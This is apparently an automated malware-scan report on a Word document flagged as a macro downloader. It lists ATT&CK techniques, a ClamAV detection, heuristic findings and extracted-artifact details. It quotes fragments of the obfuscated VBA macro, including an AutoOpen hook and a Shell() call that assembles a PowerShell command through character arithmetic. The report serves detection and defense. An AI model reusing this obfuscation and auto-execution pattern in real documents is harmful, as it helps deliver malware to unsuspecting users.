Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, indicating an attempt to execute external commands. The presence of 'Autoopen' and 'Shell' in the heuristic firings, together with the structure of the VBA script, strongly suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `AuuEJ = YQNhT fXScw = PcWBv + Shell(WuNPo + Chr(zYaVi + vbKeyP + VubiSDifRK) + "owers" + fjsTzcUwVvB + JRQbVHwU + QdHLjZUAFpY + TiJztXv + DLSNvi, 75499 - 75499) TAnjXc = CLng(75695 * CSng(ffNJB + ChrB(GkHNL + CInt(26876))))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `End Function Sub Autoopen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: fad3e86f37dbd0da6c9f4ff1fade4a74a4c46d82bbea24a9a5e62c4e52794293) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10031 bytes |
Preview script (first 1,000 lines of the extracted script)